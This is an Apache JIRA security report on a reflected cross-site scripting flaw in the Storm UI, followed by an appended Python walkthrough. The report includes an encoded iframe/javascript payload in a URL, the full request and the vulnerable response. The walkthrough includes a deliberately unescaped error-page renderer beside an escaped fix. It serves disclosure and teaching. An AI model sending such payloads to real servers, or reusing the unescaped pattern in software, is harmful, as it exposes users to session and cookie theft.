[ https://issues.apache.org/jira/browse/STORM-408?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14065533#comment-14065533 ]

Anand Krishnan commented on STORM-408:
--------------------------------------

These Cross-site Scripting security vulnerabilities are manifest in the Storm UI specifically. They were discovered using a commercial security tool that injects various attack vectors into the HTTP request and analyzes the response.

For example, changing the following HTTP GET request URL: (*NOTE: the actual server name was changed to {server_name})

{{ http://{server_name}:8080/topology/PROCESS_STATUS_TOPOLOGY-3-1402681332 }}

by changing the end of the parameter {{ 1402681332 }}
to {{ 1402681332%3Ciframe%20src=javascript:alert(1342)%20 }}

{{ http://{server_name}:8080/topology/PROCESS_STATUS_TOPOLOGY-3-1402681332%3Ciframe%20src=javascript:alert(1342)%20 }}

_Test HTTP Request and Response:_

{code}
GET /topology/PROCESS_STATUS_TOPOLOGY-3-1402681332%3Ciframe%20src=javascript:alert(1342)%20 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://{server_name}:8080/topology/PROCESS_STATUS_TOPOLOGY-3-1402681332
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Connection: Keep-Alive
DNT: 1
Host: {server_name}:8080
Cookie: sys=true
{code}

{code}
HTTP/1.1 500 Internal Server Error
Date: Wed, 18 Jun 2014 19:37:01 GMT
Content-Type: text/html; charset=iso-8859-1
Content-Length: 3183
Server: Jetty(6.1.26)

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html><head><title>Storm UI</title><link href="/css/bootstrap-1.1.0.css" rel="stylesheet" type="text/css"><link href="/css/style.css" rel="stylesheet" type="text/css"><script src="/js/jquery-1.6.2.min.js" type="text/javascript"></script><script src="/js/jquery.tablesorter.min.js" type="text/javascript"></script><script src="/js/jquery.cookies.2.2.0.min.js" type="text/javascript"></script><script src="/js/script.js" type="text/javascript"></script></head><body><h1><a href="/">Storm UI</a></h1><h2>Internal Server Error</h2><pre>NotAliveException(msg:PROCESS_STATUS_TOPOLOGY-3-1402681332<iframe src=javascript:alert(1342) )
        at backtype.storm.generated.Nimbus$getTopologyInfo_result.read(Nimbus.java:11330)
        at org.apache.thrift7.TServiceClient.receiveBase(TServiceClient.java:78)
        at backtype.storm.generated.Nimbus$Client.recv_getTopologyInfo(Nimbus.java:474)
        at backtype.storm.generated.Nimbus$Client.getTopologyInfo(Nimbus.java:461)
        at backtype.storm.ui.core$topology_page.invoke(core.clj:481)
        at backtype.storm.ui.core$fn__7877.invoke(core.clj:745)
        at compojure.core$make_route$fn__3855.invoke(core.clj:93)
        at compojure.core$if_route$fn__3843.invoke(core.clj:39)
        at compojure.core$if_method$fn__3836.invoke(core.clj:24)
        at compojure.core$routing$fn__3861.invoke(core.clj:106)
        at clojure.core$some.invoke(core.clj:2390)
        at compojure.core$routing.doInvoke(core.clj:106)
        at clojure.lang.RestFn.applyTo(RestFn.java:139)
        at clojure.core$apply.invoke(core.clj:603)
        at compojure.core$routes$fn__3865.invoke(core.clj:111)
        at ring.middleware.reload$wrap_reload$fn__7170.invoke(reload.clj:14)
        at backtype.storm.ui.core$catch_errors$fn__7912.invoke(core.clj:798)
        at ring.middleware.keyword_params$wrap_keyword_params$fn__4391.invoke(keyword_params.clj:27)
        at ring.middleware.nested_params$wrap_nested_params$fn__4428.invoke(nested_params.clj:65)
        at ring.middleware.params$wrap_params$fn__4365.invoke(params.clj:55)
        at ring.middleware.multipart_params$wrap_multipart_params$fn__4454.invoke(multipart_params.clj:103)
        at ring.middleware.flash$wrap_flash$fn__4729.invoke(flash.clj:14)
        at ring.middleware.session$wrap_session$fn__4720.invoke(session.clj:43)
        at ring.middleware.cookies$wrap_cookies$fn__4657.invoke(cookies.clj:160)
        at ring.adapter.jetty$proxy_handler$fn__4204.invoke(jetty.clj:16)
        at ring.adapter.jetty.proxy$org.mortbay.jetty.handler.AbstractHandler$0.handle(Unknown Source)
        at org.mortbay.jetty.handler.HandlerWrapper.handle(HandlerWrapper.java:152)
        at org.mortbay.jetty.Server.handle(Server.java:326)
        at org.mortbay.jetty.HttpConnection.handleRequest(HttpConnection.java:542)
        at org.mortbay.jetty.HttpConnection$RequestHandler.headerComplete(HttpConnection.java:928)
        at org.mortbay.jetty.HttpParser.parseNext(HttpParser.java:549)
        at org.mortbay.jetty.HttpParser.parseAvailable(HttpParser.java:212)
        at org.mortbay.jetty.HttpConnection.handle(HttpConnection.java:404)
        at org.mortbay.jetty.bio.SocketConnector$Connection.run(SocketConnector.java:228)
        at org.mortbay.thread.QueuedThreadPool$PoolThread.run(QueuedThreadPool.java:582)
</pre></body></html>
{code}

The test result seems to indicate a vulnerability because the commercial security tool successfully embedded a script in the response, which will be executed when the page loads in the user's browser.

Let me know if this is the type of detail you were interested in.



> Cross-Site Scripting security vulnerability
> -------------------------------------------
>
>                 Key: STORM-408
>                 URL: https://issues.apache.org/jira/browse/STORM-408
>             Project: Apache Storm (Incubating)
>          Issue Type: Bug
>    Affects Versions: 0.9.3-incubating
>         Environment: Java
>            Reporter: Anand Krishnan
>              Labels: security
>             Fix For: 0.9.3-incubating, feature-security
>
>
> There are Cross-Site Scripting security vulnerabilities in Apache Storm.
> The risk is that it is possible to steal or manipulate customer session and 
> cookies, which might be used to impersonate a legitimate user, allowing the 
> hacker to view or alter user records, and to perform transactions as that 
> user.
> The reason is that sanitation of hazardous characters was not performed 
> correctly on user input.



--
This message was sent by Atlassian JIRA
(v6.2#6252)
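The mechanism visible in the exchange above is a reflected XSS through an error page: the percent-encoded `<iframe ...>` in the URL path is decoded by the container, travels into the `NotAliveException` message, and is written into the `<pre>` of a `text/html` 500 page without HTML escaping, so the browser parses it as a real tag. The following is an added example (not the reporter's scanner and not Storm's own code) that reproduces the three steps with constructed stand-ins: building the probe path exactly as in the request above, a deliberately unescaped error renderer beside a hardened one that escapes the exception text, and the check a scanner applies to the response body. `render_error_page_vulnerable`, `render_error_page_fixed`, `not_alive_message` and `reflects_markup` are hypothetical names chosen for this example.

```python
import html
import re
from urllib.parse import quote, unquote

# Constructed probe mirroring the payload in the comment above (no new exploit):
# "<iframe src=javascript:alert(1342) " with a trailing space.
PROBE = "<iframe src=javascript:alert(1342) "


def build_probe_path(topology_id: str, probe: str = PROBE) -> str:
    """Append the probe to the topology id and percent-encode it the way the
    scanner did: '<' and ' ' become %3C and %20, '=' ':' '(' ')' stay literal."""
    return "/topology/" + quote(topology_id + probe, safe="=:()")


def decode_path_segment(path: str) -> str:
    """What the route handler receives: the last path segment, percent-decoded."""
    return unquote(path.rsplit("/", 1)[-1])


def not_alive_message(topology_id: str) -> str:
    """Constructed stand-in for the 'NotAliveException(msg:<id>)' text in the trace;
    the untrusted id ends up inside the exception message verbatim."""
    return "NotAliveException(msg:%s)" % topology_id


def _page(pre_body: str) -> str:
    # Skeleton of the 500 page seen in the response: title, heading, <pre> body.
    return ('<html><head><title>Storm UI</title></head><body>'
            '<h1><a href="/">Storm UI</a></h1><h2>Internal Server Error</h2>'
            '<pre>' + pre_body + '</pre></body></html>')


def render_error_page_vulnerable(exc_message: str) -> str:
    """Deliberately reproduces the bug: exception text is interpolated into the
    HTML unescaped. A <pre> element does NOT stop the parser from creating tags."""
    return _page(exc_message)


def render_error_page_fixed(exc_message: str) -> str:
    """Hardened form: HTML-escape anything derived from the request before it is
    written into the document, so '<' becomes '&lt;' and is shown as text."""
    return _page(html.escape(exc_message, quote=True))


def reflects_markup(body: str, probe: str = PROBE) -> bool:
    """The scanner's check: does the probe's tag survive in the response as an
    actual tag ('<iframe')? An escaped copy ('&lt;iframe') does not match."""
    m = re.match(r"\s*<\s*([A-Za-z][A-Za-z0-9]*)", probe)
    if not m:
        return False
    tag = m.group(1)
    return re.search(r"<\s*" + re.escape(tag) + r"\b", body, re.IGNORECASE) is not None


def simulate(topology_id: str, renderer) -> str:
    """Run the request through the whole chain and return the response body."""
    path = build_probe_path(topology_id)
    decoded_id = decode_path_segment(path)
    return renderer(not_alive_message(decoded_id))


if __name__ == "__main__":
    tid = "PROCESS_STATUS_TOPOLOGY-3-1402681332"  # id from the comment above
    print("probe path:", build_probe_path(tid))
    print("vulnerable page reflects markup:",
          reflects_markup(simulate(tid, render_error_page_vulnerable)))
    print("fixed page reflects markup:",
          reflects_markup(simulate(tid, render_error_page_fixed)))
```

The check is on the response body, not on the status code: a 500 with `Content-Type: text/html` is rendered by the browser like any other page, which is why an error handler that echoes exception messages needs the same output encoding as a normal template.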
